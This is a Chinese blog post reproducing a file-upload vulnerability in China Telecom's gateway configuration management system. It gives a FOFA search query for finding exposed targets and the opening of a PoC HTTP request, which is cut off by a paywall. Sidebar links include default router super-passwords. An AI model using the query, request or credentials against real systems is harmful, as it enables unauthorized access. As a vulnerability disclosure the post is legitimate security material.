电信网关配置管理系统后台 upload.php 文件上传漏洞复现

已于 2023-12-14 23:39:55 修改
阅读量1.5k 收藏 9
点赞数 10
分类专栏: 漏洞复现v1 文章标签: php 安全 web安全
于 2023-12-14 23:38:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41904294/article/details/135006683
版权
本文介绍了中国电信网关配置管理系统后台存在的一个文件上传漏洞,详细解析了漏洞概述、复现环境及过程,并给出了修复建议。攻击者能够利用此漏洞获取系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。

0x02 漏洞概述

电信网关配置管理系统后台 /manager/teletext/material/upload.php 接口存在文件上传漏洞,攻击者可以利用文件上传漏洞获取系统权限。

0x03 复现环境

FOFA:body="img/login_bg3.png" && body="系统登录"

0x04 漏洞复现

PoC

POST /manager/teletext/material/upload.php HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWe
了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现电信网关配置管理系统SQL注入漏洞
晚风不及你
02-06 1441
中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
中国电信天翼网关路由器后台登录useradmin用户忘记密码的解决方法默认密码管理员密码工作人员密码
热门推荐
SubStar的博客
08-01 9万+
电信天翼网关路由器忘记登录密码解决方法解决方法1解决方法2解决方法3解决方法4 忘记密码不用怕,以下方法可帮你解决。 解决方法 忘记密码别着急,可以通过以下方法来解决。 解决方法1 找到自家的路由器,一般情况下载路由器的背面有默认的账号密码,可以试下。这种情况适合于您从来没有修改过默认密码。 解决方法2 如果您已经修改过默认密码,又不记得新密码, 可以测试恢复出厂设置,让密码重置。路由器后面有个复位的按钮,长按住不动,一直按着等灯闪了之后再松手,路由器恢复出厂设置后再使用路由器背面的默认密码登录。 解决方
电信HG2201T网关(部分地区的电信网关2.0)超级密码获取
little_Joey的博客
05-26 1万+
账号(TELECOMACCOUNT):telecomadmin 密码(TELECOMPASSWORD): telecomadmin15079128
Goby 漏洞发布|电信网关配置管理系统后台 /manager/teletext/material/upload.php 文件上传漏洞
m0_46699477的博客
06-21 618
中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。 电信网关配置管理系统后台 /manager/teletext/material/upload.php 存在文件上传漏洞,攻击者可以利用文件上传漏洞获取系统权限。
漏洞复现电信网关配置管理系统-文件上传-upload
知黑而守白
05-31 305
电信网关配置管理系统是一个用于管理和配置电信网络中网关设备的软件系统。它可以帮助网络管理员实现对网关设备的远程监控、配置、升级和故障排除等功能,从而确保网络的正常运行和高效性能。电信网关配置管理系统某接口处存在任意文件上传,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
配置php.ini实现PHP文件上传功能
10-25
php.ini中,有几个关键的配置选项直接关系到文件上传是否能够成功执行以及上传文件的大小限制,这些配置选项包括file_uploads、upload_tmp_dir、upload_max_filesize和post_max_size。下面详细介绍这些配置选项的...
简单的文件共享系统php源码带后台管理无需数据库上传即用
01-07
成功登录后,admin_panel.php文件作为后台管理面板,管理员可以在这里执行文件管理、查看上传日志等操作。preview.php文件可能提供文件预览功能,这使得在没有下载文件的情况下,用户可以直接查看内容。 uploads_...
文件上传upload.php
03-16
文件上传upload.php
电信网关配置管理系统 upload_channels.php 文件上传致RCE漏洞复现
0xSec
11-08 772
电信网关配置管理系统/bak_manager/upload_channels.php 接口存在文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
大大怪将军,你来啦!
06-11 1081
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
电信网关接口程序 智能路由管理
12-19 569
主要功能: Ø         提供MO到各业务模块的业务路由——根据长号码或业务代码进行业务路由,分配给相应的业务模块处理: ²        根据长号码把某一号码、或某一号码段的MO转发到指定业务 ²        根据特定业务代码,回馈相应内容     下面来说说整个的路由: 1 生成web service的服务端  ,写一个接口,记录上行,写入数据库A表中. 2添加触发
wo-27s管理员账户和密码_获取电信天翼网关超级密码,修改路由模式为桥接模式...
weixin_39931923的博客
10-21 1万+
概述现在家庭安装的宽带基本上都是光纤入户了,极大的提升了上网的速度,光猫是将光纤中的光信号转换成电信号,光纤口转换成网口的必备入网设备,相信有不少的网络爱好者喜欢自己独立研究,但是电信配的光猫大多是只给了我们普通的账号,并没有给管理账号。然而,想要自己去设置光猫是需要超级管理账号密码的,这里就给大家讲一下如何用简单的方法获取到电信光猫天翼网关的超级密码,并将默认的路由模式修改为桥接模式。操作步骤1...
一次对天翼安全网关的渗透
zhangge3663的博客
01-29 5473
起因 听大师傅说天翼安全网关可以telnet登录,回去尝试了一下发现并没有开放telnet端口,把目标转向如何开启,经过一系列搜索,最后拿下网关 信息泄露 我家这个网关型号是HG261GS,经过一番搜索,发现访问http://192.168.1.1/cgi-bin/baseinfoSet.cgi可以拿到密码 然后搜索密码的加密方式,得到工程账号的密码,加密算法为加密算法: 字母转换为其ASCII码+4,数字直接就是ASCII码。 之后登陆 命令执行 在后台转了一圈没发现开启tel.
Vulnhub-XXE靶场通关攻略
qq_65852138的博客
03-31 556
将解码结果放在php文件中并加上<?php标识符,进行访问即可得到flag。在flagmeout.php的页面源代码中得到了flag。使用xxe漏洞访问这个目录/etc/.flag.php。得到了xxe/admin.php目录,来到了新页面。将flag放在cyberchef中进行解码。解码admin.php进行代码审计。base64解码,得到用户名和密码。在admin.php目录中进行登录。得到/etc/.flag.php。访问一下robots.txt。尝试读取xxe.php源码。
php8 match表达式使用教程
最新发布
tangPHP的博客
04-02 423
PHP 8引入了match()表达式,用来替代传统的switch语句,提供更简洁、更安全的方式进行条件匹配。与switch不同,match()是一个表达式,它会返回值,并且使用 严格比较(===
phpStorm2021.3.3在windows系统上配置Xdebug调试
shenshulong的博客
03-31 212
phpStorm工具中配置Xdebug调试详情过程
unidbg读写跟踪还原X-Gorgon
a545958498的博客
03-31 619
后20字节 0x06292b2e51bf21d8e270474e655a4379e5d3f7f6,指令地址 0x804e8。都是同一个地址,应该是在做加密运算。参数签名函数调用序列 0x88ee0 -> 0x87e48 -> 0x86d60 -> 0x6B14c。第5和6字节 0x0000,指令地址0x13742c,初始化buffer为0后没有再写入。进一步跟踪,查看地址 0xbfffda60 + 0x12 ,在哪里被写入 0x3d。第1个字节 0x84,指令地址 0x81138,直接写入无需计算。
通达OA v2017 action_upload.php高危任意文件上传漏洞解析
通达OA v2017版本中的action_upload.php文件存在一个严重的任意文件上传漏洞。这个漏洞源于该文件的过滤机制存在缺陷,使得攻击者能够绕过安全控制,无需任何权限就能将任意类型的文件上传到系统的服务器上。这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值